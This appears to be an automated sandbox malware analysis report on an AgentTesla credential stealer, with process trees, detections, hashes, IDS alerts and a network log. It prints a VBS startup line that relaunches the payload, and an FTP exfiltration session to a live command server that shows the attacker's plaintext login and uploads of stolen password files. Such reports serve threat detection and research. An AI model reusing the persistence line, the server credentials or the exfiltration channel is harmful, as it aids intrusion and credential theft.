                    Registry Run Keys / Startup Folder
                    12
                    Software Packing
                    NTDS12
                    Virtualization/Sandbox Evasion
                    Distributed Component Object Model1
                    Input Capture
                    11
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets1
                    Process Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                    Virtualization/Sandbox Evasion
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Process Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Behavior Graph ID: 1549420; Sample: O65887cvz7.exe; Startdate: 05/11/2024; Architecture: WINDOWS; Score: 100
                    DNS/IP: ftp.alternatifplastik.com
                    Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
                    • O65887cvz7.exe (started)
                      Dropped: C:\Users\user\AppData\...\InnerException.exe, PE32
                      Dropped: C:\Users\user\AppData\...\InnerException.vbs, ASCII
                      Dropped: C:\...\InnerException.exe:Zone.Identifier, ASCII
                      Signature: Drops VBS files to the startup folder
                      Signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      • InstallUtil.exe (started)
                        DNS/IP: ftp.alternatifplastik.com 5.2.84.236, 21, 49704, 49705 ALASTYRTR Turkey
                        Signature: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Signature: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Signature: Tries to steal Mail credentials (via file / registry access)
                    • wscript.exe (started)
                      Signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      • InnerException.exe (started)
                        Signature: Antivirus detection for dropped file
                        Signature: Multi AV Scanner detection for dropped file
                        Signature: Machine Learning detection for dropped file
                        • InstallUtil.exe (started)
                          Signature: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                          Signature: Tries to steal Mail credentials (via file / registry access)
                          Signature: Tries to harvest and steal ftp login credentials
                          Signature: Tries to harvest and steal browser information (history, passwords, etc)

                    Source | Detection | Scanner | Label | Link
                    O65887cvz7.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.GenSteal
                    O65887cvz7.exe | 100% | Avira | TR/AD.GenSteal.dkodx
                    O65887cvz7.exe | 100% | Joe Sandbox ML

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Roaming\InnerException.exe | 100% | Avira | TR/AD.GenSteal.dkodx
                    C:\Users\user\AppData\Roaming\InnerException.exe | 100% | Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\InnerException.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.GenSteal
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label | Link
http://ftp.alternatifplastik.com | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ftp.alternatifplastik.com | 5.2.84.236 | true | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
5.2.84.236 | ftp.alternatifplastik.com | Turkey | | 3188 | ALASTYRTR | true
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1549420
                                      Start date and time:2024-11-05 16:13:54 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 9s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:8
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:O65887cvz7.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:f6c07c1f1b936ac8da62b2a68392634053d0b39c2da4c7ba98e7b7e0ae9fbf94.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@1/1
                                      EGA Information:
                                      • Successful, ratio: 50%
                                      HCA Information:
                                      • Successful, ratio: 97%
                                      • Number of executed functions: 219
                                      • Number of non-executed functions: 15
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target InnerException.exe, PID 5080 because it is empty
                                      • Execution Graph export aborted for target O65887cvz7.exe, PID 6616 because it is empty
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: O65887cvz7.exe
Time | Type | Description
16:14:47 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
5.2.84.236 | Request for Quotation-537262227-04.exe | malicious | AgentTesla |
5.2.84.236 | AYV0eq1Gyc.exe | malicious | AgentTesla |
5.2.84.236 | GEFA-Order 232343-68983689.exe | malicious | AgentTesla |
5.2.84.236 | GEFA-Order 232343-68983689.exe | malicious | AgentTesla |
5.2.84.236 | Kuwait Offer48783929281-BZ2.exe | malicious | AgentTesla |
5.2.84.236 | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla |
5.2.84.236 | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla |
5.2.84.236 | inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe | malicious | AgentTesla |
5.2.84.236 | PO_9876563647-FLOWTRONIX (FT)UUE.exe | malicious | AgentTesla |
5.2.84.236 | Richardson Electronics, LTD. PRD10221301UUE.exe | malicious | AgentTesla |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
ftp.alternatifplastik.com | Request for Quotation-537262227-04.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | AYV0eq1Gyc.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | GEFA-Order 232343-68983689.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | GEFA-Order 232343-68983689.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | Kuwait Offer48783929281-BZ2.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | PO_9876563647-FLOWTRONIX (FT)UUE.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | Richardson Electronics, LTD. PRD10221301UUE.exe | malicious | AgentTesla | 5.2.84.236

Match | Associated Sample Name / URL | Detection | Threat Name | Context
ALASTYRTR | Request for Quotation-537262227-04.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | AYV0eq1Gyc.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | GEFA-Order 232343-68983689.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | GEFA-Order 232343-68983689.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | Kuwait Offer48783929281-BZ2.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | PO_9876563647-FLOWTRONIX (FT)UUE.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | Richardson Electronics, LTD. PRD10221301UUE.exe | malicious | AgentTesla | 5.2.84.236
                                                          No context
                                                          No context
                                                          Process:C:\Users\user\Desktop\O65887cvz7.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1211392
                                                          Entropy (8bit):7.848748414848261
                                                          Encrypted:false
                                                          SSDEEP:24576:YtRjwkfngUIZzFwjcD5tH21r1o2LOGYca1Ip:mcEUxFwjwb0ho2XYC
                                                          MD5:7059C9FAE0E7595BF454796551C79DAB
                                                          SHA1:EF9D22E79DD8F6482C1E1B6C285555B23026575E
                                                          SHA-256:F6C07C1F1B936AC8DA62B2A68392634053D0B39C2DA4C7BA98E7B7E0AE9FBF94
                                                          SHA-512:7696EF0E5063CAA138A2AE832A498E62C19A33626194CDEB31D0159D6E86636BB494DB461800FE5F8A7D014E607D3679EA74D54E8465322019EA22059BD6C218
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..g.................r..........N.... ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text...Tq... ...r.................. ..`.rsrc................t..............@..@.reloc...............z..............@..B................0.......H...........D...........Lj...$...........................................0..........(....*.*.(....*..0../.........(....}.......}......|......(...+..|....(....*..(....*..0..].........8.....(..........&......,......&................}.....|.....(............}.....|.....(....*....(...................!..................6.|.....(....*...0.......... .l..(....(..... /m..(....(.....(....o.....s........o......s...........s............io......o.......'..,...o.......,...o......,..o.....&
                                                          Process:C:\Users\user\Desktop\O65887cvz7.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Reputation:high, very likely benign file
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          Process:C:\Users\user\Desktop\O65887cvz7.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):90
                                                          Entropy (8bit):4.7652159135119065
                                                          Encrypted:false
                                                          SSDEEP:3:FER/n0eFHHoUkh4EaKC51XYG+LNHHHn:FER/lFHI9aZ51Xr01
                                                          MD5:596C834DE3933F141DD5BF4A5293D3F7
                                                          SHA1:2B261BFA86E7AC65C0CD112641587F62F995DCD8
                                                          SHA-256:6858D4D00C56F9CE159BCF47BF3AA1FDB8EEAE0282F23BF06F508EDF994E6344
                                                          SHA-512:624D574ED8EFE5CD226F9DFBE73A062265AAA1F7F2358899EBF23E7B7CC0BA2DB8542F87E9A1032AFBB845DBFCFEC5285A6E11F64ED989D7C1C4AD4DDB970AC7
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\InnerException.exe"""
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.848748414848261
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:O65887cvz7.exe
                                                          File size:1'211'392 bytes
                                                          MD5:7059c9fae0e7595bf454796551c79dab
                                                          SHA1:ef9d22e79dd8f6482c1e1b6c285555b23026575e
                                                          SHA256:f6c07c1f1b936ac8da62b2a68392634053d0b39c2da4c7ba98e7b7e0ae9fbf94
                                                          SHA512:7696ef0e5063caa138a2ae832a498e62c19a33626194cdeb31d0159d6e86636bb494db461800fe5f8a7d014e607d3679ea74d54e8465322019ea22059bd6c218
                                                          SSDEEP:24576:YtRjwkfngUIZzFwjcD5tH21r1o2LOGYca1Ip:mcEUxFwjwb0ho2XYC
                                                          TLSH:224501007688C67BD21D53F6C5A3A48DEBE0826DF35EE3DB7C8C64F829017A1A42565F
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..g.................r..........N.... ........@.. ....................................`................................
                                                          Icon Hash:00928e8e8686b000
                                                          Entrypoint:0x52914e
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x670E8663 [Tue Oct 15 15:12:35 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1290f8 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x12a000 | 0x600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x127154 | 0x127200 | 1b50792ce42b050b17c8ae6b8c87c901 | False | 0.8945271137759424 | data | 7.853075047144905 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x12a000 | 0x600 | 0x600 | 2f619f09d30c478af9ae991d7555d9c5 | False | 0.4134114583333333 | data | 4.027780233263417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x12c000 | 0xc | 0x200 | 9edea39cead5bdd0dd9a4c90f901546c | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x12a0a0 | 0x2fc | data |  |  | 0.43848167539267013
RT_MANIFEST | 0x12a39c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |  |  | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-05T16:14:49.414192+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.5 | 49704 | 5.2.84.236 | 21 | TCP
2024-11-05T16:14:50.253913+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49705 | 5.2.84.236 | 58644 | TCP
2024-11-05T16:14:50.259852+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49705 | 5.2.84.236 | 58644 | TCP
2024-11-05T16:15:02.464005+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.5 | 49706 | 5.2.84.236 | 21 | TCP
2024-11-05T16:15:03.287183+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49709 | 5.2.84.236 | 59913 | TCP
2024-11-05T16:15:03.294837+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49709 | 5.2.84.236 | 59913 | TCP
2024-11-05T16:15:03.349715+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.5 | 49707 | TCP
2024-11-05T16:15:41.776869+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.5 | 49873 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 5, 2024 16:14:46.618217945 CET | 58287 | 53 | 192.168.2.5 | 1.1.1.1
Nov 5, 2024 16:14:46.722846985 CET | 53 | 58287 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 5, 2024 16:14:46.618217945 CET | 192.168.2.5 | 1.1.1.1 | 0x3d17 | Standard query (0) | ftp.alternatifplastik.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 5, 2024 16:14:46.722846985 CET | 1.1.1.1 | 192.168.2.5 | 0x3d17 | No error (0) | ftp.alternatifplastik.com |  | 5.2.84.236 | A (IP address) | IN (0x0001) | false

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 5, 2024 16:14:47.557940960 CET | 21 | 49704 | 5.2.84.236 | 192.168.2.5 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
 |  |  |  |  | 220-You are user number 2 of 100 allowed.
 |  |  |  |  | 220-Local time is now 18:14. Server port: 21.
 |  |  |  |  | 220-This is a private system - No anonymous login
 |  |  |  |  | 220-IPv6 connections are also welcome on this server.
 |  |  |  |  | 220 You will be disconnected after 10 minutes of inactivity.
Nov 5, 2024 16:14:47.558146954 CET | 49704 | 21 | 192.168.2.5 | 5.2.84.236 | USER fgghv@alternatifplastik.com
Nov 5, 2024 16:14:47.851866961 CET | 21 | 49704 | 5.2.84.236 | 192.168.2.5 | 331 User fgghv@alternatifplastik.com OK. Password required
Nov 5, 2024 16:14:47.852010965 CET | 49704 | 21 | 192.168.2.5 | 5.2.84.236 | PASS Fineboy777@
Nov 5, 2024 16:14:48.224853992 CET | 21 | 49704 | 5.2.84.236 | 192.168.2.5 | 230 OK. Current restricted directory is /
Nov 5, 2024 16:14:48.520653963 CET | 21 | 49704 | 5.2.84.236 | 192.168.2.5 | 504 Unknown command
Nov 5, 2024 16:14:48.520804882 CET | 49704 | 21 | 192.168.2.5 | 5.2.84.236 | PWD
Nov 5, 2024 16:14:48.815012932 CET | 21 | 49704 | 5.2.84.236 | 192.168.2.5 | 257 "/" is your current location
Nov 5, 2024 16:14:48.816781998 CET | 49704 | 21 | 192.168.2.5 | 5.2.84.236 | TYPE I
Nov 5, 2024 16:14:49.110512018 CET | 21 | 49704 | 5.2.84.236 | 192.168.2.5 | 200 TYPE is now 8-bit binary
Nov 5, 2024 16:14:49.110735893 CET | 49704 | 21 | 192.168.2.5 | 5.2.84.236 | PASV
Nov 5, 2024 16:14:49.405493021 CET | 21 | 49704 | 5.2.84.236 | 192.168.2.5 | 227 Entering Passive Mode (5,2,84,236,229,20)
Nov 5, 2024 16:14:49.414191961 CET | 49704 | 21 | 192.168.2.5 | 5.2.84.236 | STOR PW_user-760639_2024_11_05_10_14_45.html
Nov 5, 2024 16:14:50.253566027 CET | 21 | 49704 | 5.2.84.236 | 192.168.2.5 | 150 Accepted data connection
Nov 5, 2024 16:14:50.547862053 CET | 21 | 49704 | 5.2.84.236 | 192.168.2.5 | 226-File successfully transferred
 |  |  |  |  | 226 0.300 seconds (measured here), 1.04 Kbytes per second
Nov 5, 2024 16:15:00.649292946 CET | 21 | 49706 | 5.2.84.236 | 192.168.2.5 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
 |  |  |  |  | 220-You are user number 3 of 100 allowed.
 |  |  |  |  | 220-Local time is now 18:14. Server port: 21.
 |  |  |  |  | 220-This is a private system - No anonymous login
 |  |  |  |  | 220-IPv6 connections are also welcome on this server.
 |  |  |  |  | 220 You will be disconnected after 10 minutes of inactivity.
Nov 5, 2024 16:15:00.649571896 CET | 49706 | 21 | 192.168.2.5 | 5.2.84.236 | USER fgghv@alternatifplastik.com
Nov 5, 2024 16:15:00.964030981 CET | 21 | 49706 | 5.2.84.236 | 192.168.2.5 | 331 User fgghv@alternatifplastik.com OK. Password required
Nov 5, 2024 16:15:00.964308023 CET | 49706 | 21 | 192.168.2.5 | 5.2.84.236 | PASS Fineboy777@
Nov 5, 2024 16:15:01.274818897 CET | 21 | 49706 | 5.2.84.236 | 192.168.2.5 | 230 OK. Current restricted directory is /
Nov 5, 2024 16:15:01.566062927 CET | 21 | 49706 | 5.2.84.236 | 192.168.2.5 | 504 Unknown command
Nov 5, 2024 16:15:01.566447973 CET | 49706 | 21 | 192.168.2.5 | 5.2.84.236 | PWD
Nov 5, 2024 16:15:01.856513977 CET | 21 | 49706 | 5.2.84.236 | 192.168.2.5 | 257 "/" is your current location
Nov 5, 2024 16:15:01.860585928 CET | 49706 | 21 | 192.168.2.5 | 5.2.84.236 | TYPE I
Nov 5, 2024 16:15:02.163722992 CET | 21 | 49706 | 5.2.84.236 | 192.168.2.5 | 200 TYPE is now 8-bit binary
Nov 5, 2024 16:15:02.165029049 CET | 49706 | 21 | 192.168.2.5 | 5.2.84.236 | PASV
Nov 5, 2024 16:15:02.456311941 CET | 21 | 49706 | 5.2.84.236 | 192.168.2.5 | 227 Entering Passive Mode (5,2,84,236,234,9)
Nov 5, 2024 16:15:02.464004993 CET | 49706 | 21 | 192.168.2.5 | 5.2.84.236 | STOR PW_user-760639_2024_11_05_10_14_58.html
Nov 5, 2024 16:15:03.286788940 CET | 21 | 49706 | 5.2.84.236 | 192.168.2.5 | 150 Accepted data connection
Nov 5, 2024 16:15:03.579176903 CET | 21 | 49706 | 5.2.84.236 | 192.168.2.5 | 226-File successfully transferred
 |  |  |  |  | 226 0.292 seconds (measured here), 1.07 Kbytes per second


Target ID: 0
Start time: 10:14:42
Start date: 05/11/2024
Path: C:\Users\user\Desktop\O65887cvz7.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\O65887cvz7.exe"
Imagebase: 0x670000
File size: 1'211'392 bytes
MD5 hash: 7059C9FAE0E7595BF454796551C79DAB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2034394668.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2051151028.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2051151028.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2054427117.0000000005680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 10:14:43
Start date: 05/11/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase: 0xe00000
File size: 42'064 bytes
MD5 hash: 5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2167823876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2167823876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2179804969.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2179804969.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2179804969.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true

Target ID: 3
Start time: 10:14:55
Start date: 05/11/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs"
Imagebase: 0x7ff6c2f00000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 10:14:56
Start date: 05/11/2024
Path: C:\Users\user\AppData\Roaming\InnerException.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\InnerException.exe"
Imagebase: 0x790000
File size: 1'211'392 bytes
MD5 hash: 7059C9FAE0E7595BF454796551C79DAB
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2170960789.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2170960789.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
